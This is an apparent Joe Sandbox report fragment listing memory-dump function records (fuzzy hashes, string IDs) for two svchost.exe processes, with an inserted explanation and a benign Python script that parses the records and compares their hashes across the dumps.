                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8ea5a5ec3f47479a7f696c8b9792f5260bb29ce33e307b49f81a4661b9a3319b
                                                                    • Instruction ID: ac1e07ffa528ba6bdde1452d48a07092f1f2b9a5cad519c9165c2b051f666eda
                                                                    • Opcode Fuzzy Hash: 8ea5a5ec3f47479a7f696c8b9792f5260bb29ce33e307b49f81a4661b9a3319b
                                                                    • Instruction Fuzzy Hash: E8816676B0891A4BD701BB7CB8562FD7BA0EF853B1B54857BC108CB293CA24B096C7D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a029cc1043ba971559b7b0b96600e0a84befa90493522aaf75f26c4f5e22927b
                                                                    • Instruction ID: e4ebe706f109bcd75d836d8f3cd8197e57b4234ee0e4f57ccdade410d07081b6
                                                                    • Opcode Fuzzy Hash: a029cc1043ba971559b7b0b96600e0a84befa90493522aaf75f26c4f5e22927b
                                                                    • Instruction Fuzzy Hash: 19815576B0891A4BD701BB7CB8162FD7BA4EF853B1B54857BC108CB293CA24B096C7D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 513896c2f9bd20205297c23c9b381bd202aa72d621097bb52880eca7753ee535
                                                                    • Instruction ID: 5ba440bb5bb8d9222bd136c15958b1aee963597952aa83223e81d93e06f984b0
                                                                    • Opcode Fuzzy Hash: 513896c2f9bd20205297c23c9b381bd202aa72d621097bb52880eca7753ee535
                                                                    • Instruction Fuzzy Hash: BA714576B0891A4BD701BB7CB8562FD7BA4EF853B1B54867AD108C7293CA34B086C7D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9ddf63612c3d39a6526d59c9756105b50712e570672c9f5bb0a62d37872d9fe3
                                                                    • Instruction ID: 3ebb5e10137449304c24dec6ca2c4cf15e56a3f17983d245576abf618a93764b
                                                                    • Opcode Fuzzy Hash: 9ddf63612c3d39a6526d59c9756105b50712e570672c9f5bb0a62d37872d9fe3
                                                                    • Instruction Fuzzy Hash: B631B520B18D490FE798EB6C9469779B6C2EF99365F4402BEE40EC3293DE64AC428341
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1fd8bcad5b3637168a2c0577099f7fd069766d0b311cd2ffc7ffc1e7ad3764dd
                                                                    • Instruction ID: 214d573e6046248d1f216fa0e5bd2fe39fb2da46c0c8e9a21704af53be126d02
                                                                    • Opcode Fuzzy Hash: 1fd8bcad5b3637168a2c0577099f7fd069766d0b311cd2ffc7ffc1e7ad3764dd
                                                                    • Instruction Fuzzy Hash: 4A31A361B18A094FE744BBBC581A7FDB6D5EF98761F54427AE10DC3283DE28B8418392
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 925c0b63a7e916935e88b2744ee1b52ebef725115a0a4d3fc3c0ad710eb88d40
                                                                    • Instruction ID: 2ee1a9d00caafaf642bb0af510bf82006450214f4d2ffce95d0cac56cefb062a
                                                                    • Opcode Fuzzy Hash: 925c0b63a7e916935e88b2744ee1b52ebef725115a0a4d3fc3c0ad710eb88d40
                                                                    • Instruction Fuzzy Hash: 28419174A18A098FDB85FB6898656EDBBB1FF99310F904579D009C3382CE387845C792
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c458295cf272a97412469cb97af9a134979a2d63181c4e9b533bacd2a596d23
                                                                    • Instruction ID: 0c2b96640b1a63e0f1d5dbd4e237fcf2c5b62b7f712dae2af40d351cf8bc13e2
                                                                    • Opcode Fuzzy Hash: 1c458295cf272a97412469cb97af9a134979a2d63181c4e9b533bacd2a596d23
                                                                    • Instruction Fuzzy Hash: BF31A469A68A494FD385FB2898BA5B97FB1EF89300FC084B9D448C3397CE347854C752
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd247f2460b7d14fb24e922ee533e975af4aa54dd23489725eb81358a997b4a9
                                                                    • Instruction ID: 9f0c4bf47be3d5478bde74d21477738ddeca014ec70c065618706abfb3ee7eb3
                                                                    • Opcode Fuzzy Hash: fd247f2460b7d14fb24e922ee533e975af4aa54dd23489725eb81358a997b4a9
                                                                    • Instruction Fuzzy Hash: 4E219669A68A494FD385FB2898B95B9BFB1EF89300FC084ADD409C3396CE347950C752
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 64a4adf4b748ed9e348bc3f7aec0c9a45a86192ee633577daaaec79b4d7aa756
                                                                    • Instruction ID: 669a63c08f8722382b6811c117046b77d9e9a6402b71df6f50a5ee80a09c91cb
                                                                    • Opcode Fuzzy Hash: 64a4adf4b748ed9e348bc3f7aec0c9a45a86192ee633577daaaec79b4d7aa756
                                                                    • Instruction Fuzzy Hash: 4C014E55D0DAC14FE791BB385875175BFE0DF91220B8804AAD988C72E7DD08B9858393
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b66fe35d612f21fcbec69b9ee6b2ea123a36b51ffe79132f2b8708056d4216de
                                                                    • Instruction ID: 5ecd87697e796f0ce4488a8b7b26e90a43581ded4cdace7da90d3a923977c9b2
                                                                    • Opcode Fuzzy Hash: b66fe35d612f21fcbec69b9ee6b2ea123a36b51ffe79132f2b8708056d4216de
                                                                    • Instruction Fuzzy Hash: 93229571F18A594FE798FB2884656B9B6D2FF98760F940579D40EC33D2DE28B8018782
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 81905d87bd53e3d991ad51b58aab509a0ce191d88de2224e251f66dfaae81209
                                                                    • Instruction ID: 51409edc070a11a3df997a8b913f35ac37ebbf16ffb9ea7c6cde40de01ff3f8d
                                                                    • Opcode Fuzzy Hash: 81905d87bd53e3d991ad51b58aab509a0ce191d88de2224e251f66dfaae81209
                                                                    • Instruction Fuzzy Hash: BE513320A0D6C94FD756AB7C58242B9BFD5DF47265B0801FAE0C9C7293DE186C06C396
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 9L_^
                                                                    • API String ID: 0-1679237627
                                                                    • Opcode ID: 1470ca5af747991afb65030e25cc12d3b8d6f327e7b0f9a1ed53a1f7366b0305
                                                                    • Instruction ID: 7567357eeddaf67eb7a36ecdcee70468abc362981a8d1e329b9e605fe6ea05a7
                                                                    • Opcode Fuzzy Hash: 1470ca5af747991afb65030e25cc12d3b8d6f327e7b0f9a1ed53a1f7366b0305
                                                                    • Instruction Fuzzy Hash: FA610372A0891A4FE701BBBCA8522FD77A0EF88375B584676D108C7393CF28B44683D5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4L_^
                                                                    • API String ID: 0-2524838182
                                                                    • Opcode ID: f8f1c731e92090427d3859ad2aebd259bc6be6dcf936f1d9db8237b82df66317
                                                                    • Instruction ID: 6c4e8c464f984ea29973f6aefee617561f5fb5ac5b6a42e2e3e7b899eb52330b
                                                                    • Opcode Fuzzy Hash: f8f1c731e92090427d3859ad2aebd259bc6be6dcf936f1d9db8237b82df66317
                                                                    • Instruction Fuzzy Hash: 16511821A0DA860FE366A77C58662F57FE1DF86270B0941FBD08DC7293DD1CAC428362
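The blocks in this part of the report are Joe Sandbox's per-function records: each "Memory Dump Source" entry names the dump it came from, and the analysis process id is the first dotted field of the .sdmp name written in hex (00000016 and 00000017 are the svchost.exe instances that the snapshot files call hcaresult_22 and hcaresult_23, both at base 00007FF7C0CF0000 and both flagged "based on PE: false"), followed by an opcode/instruction fuzzy hash pair and any string the function references. Functions with the same String ID and API String ID show up in both svchost.exe dumps with closely related instruction fuzzy hashes, which is what one expects when the same unpacked code runs in two processes. The parser below is an added example written for this page, not Joe Sandbox code and not the tooling behind the report: it reads two records copied from the listing, cross-checks the hex process id against the snapshot file name, pairs the functions that reference the same string across the two dumps, and scores how close their instruction fuzzy hashes are. The positional match ratio is this example's own crude measure and not the metric behind the report's "Similarity" field; function and field names are the example's choices.

```python
import re
from dataclasses import dataclass
from typing import List

# Two records copied verbatim from the listing: the function referencing "9L_^" in each svchost.exe dump.
SAMPLE_RECORDS = """\
Strings
Memory Dump Source
• Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
Similarity
• API ID:
• String ID: 9L_^
• API String ID: 0-1679237627
• Opcode ID: 45ed4724ab7d60c6b2b10f2ec5a182f222c71128a21a8a3c9c9a4f2c548b24a5
• Instruction ID: ba433d8c00c6e9ddaff7117c705d7e58adaca2e4218acc2ce851983efef73abc
• Opcode Fuzzy Hash: 45ed4724ab7d60c6b2b10f2ec5a182f222c71128a21a8a3c9c9a4f2c548b24a5
• Instruction Fuzzy Hash: 3C613675A0891A4FE701BBBCA8522FC77A0EF85365B94857AD10CC7393CF28B48687D5
Strings
Memory Dump Source
• Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
Similarity
• API ID:
• String ID: 9L_^
• API String ID: 0-1679237627
• Opcode ID: 1470ca5af747991afb65030e25cc12d3b8d6f327e7b0f9a1ed53a1f7366b0305
• Instruction ID: 7567357eeddaf67eb7a36ecdcee70468abc362981a8d1e329b9e605fe6ea05a7
• Opcode Fuzzy Hash: 1470ca5af747991afb65030e25cc12d3b8d6f327e7b0f9a1ed53a1f7366b0305
• Instruction Fuzzy Hash: FA610372A0891A4FE701BBBCA8522FD77A0EF88375B584676D108C7393CF28B44683D5
"""

@dataclass
class FunctionRecord:
    pid: int               # process id from the .sdmp name; written in hex there (0x16 = 22)
    offset: int            # base address of the dumped region
    based_on_pe: bool      # the report's own flag for the dump
    string_id: str         # string(s) the function references, "" if none
    api_string_id: str
    opcode_id: str
    opcode_fuzzy: str
    instruction_fuzzy: str

_SRC = re.compile(r"^([0-9A-Fa-f]{8})\.[^,]*\.sdmp, Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
_SNAP = re.compile(r"^hcaresult_(\d+)_")

def parse_records(text: str) -> List[FunctionRecord]:
    """Split the listing into records; each 'Memory Dump Source' line opens a new one.
    Only '• Key: value' lines carry data; the other labels (Strings, Similarity, ...) are skipped."""
    blocks, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip()                   # the report is indented; strip it
        if line == "Memory Dump Source":
            if cur:
                blocks.append(cur)
            cur = {}
        elif line.startswith("• "):
            key, _, value = line[2:].partition(":")
            cur[key.strip()] = value.strip()
    if cur:
        blocks.append(cur)
    out = []
    for f in blocks:
        m = _SRC.match(f.get("Source File", ""))
        snap = _SNAP.match(f.get("Snapshot File", ""))
        if m is None or snap is None:
            raise ValueError("unparseable record: " + repr(f))
        pid = int(m[1], 16)
        if pid != int(snap[1]):              # cross-check: 00000016 must agree with hcaresult_22_...
            raise ValueError(f"process id mismatch: {pid} vs {snap[1]}")
        out.append(FunctionRecord(pid, int(m[2], 16), m[3] == "true",
                                  f.get("String ID", ""), f.get("API String ID", ""),
                                  f.get("Opcode ID", ""), f.get("Opcode Fuzzy Hash", ""),
                                  f.get("Instruction Fuzzy Hash", "")))
    return out

def hex_match_ratio(a: str, b: str) -> float:
    """Fraction of positions at which two equal-length hex strings agree (this example's crude measure)."""
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a.upper(), b.upper())) / len(a)

def pair_across_processes(records: List[FunctionRecord], pid_a: int, pid_b: int):
    """Pair functions from two dumps sharing (String ID, API String ID); score their instruction hashes."""
    by_key = {(r.string_id, r.api_string_id): r
              for r in records if r.pid == pid_a and r.string_id}
    pairs = []
    for r in records:
        if r.pid == pid_b and r.string_id:
            mate = by_key.get((r.string_id, r.api_string_id))
            if mate is not None:
                pairs.append((mate, r, hex_match_ratio(mate.instruction_fuzzy, r.instruction_fuzzy)))
    return pairs

if __name__ == "__main__":
    for a, b, score in pair_across_processes(parse_records(SAMPLE_RECORDS), 22, 23):
        print(f"pid {a.pid} <-> pid {b.pid} {a.string_id!r} @ {a.offset:#x}: match {score:.2f}")
```

Feeding it the whole listing instead of the two embedded records pairs every string-referencing function of process 22 with its counterpart in process 23; a pair whose instruction hashes match poorly, or a record whose hex process id disagrees with its snapshot file name, is the thing worth looking at by hand.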
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 347548c23a25fb313225d56d3f5221e3f172f2e6a62da66011ab54e3d7773714
                                                                    • Instruction ID: 097b02b72d6ec9b1951052cfcd56218b25e2415a6a07ef3f12430a79ec51e40f
                                                                    • Opcode Fuzzy Hash: 347548c23a25fb313225d56d3f5221e3f172f2e6a62da66011ab54e3d7773714
                                                                    • Instruction Fuzzy Hash: 72210732A086554FD301FB7CE8612E9BBA0FF82365B444677C089DB293DF28741687D5
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd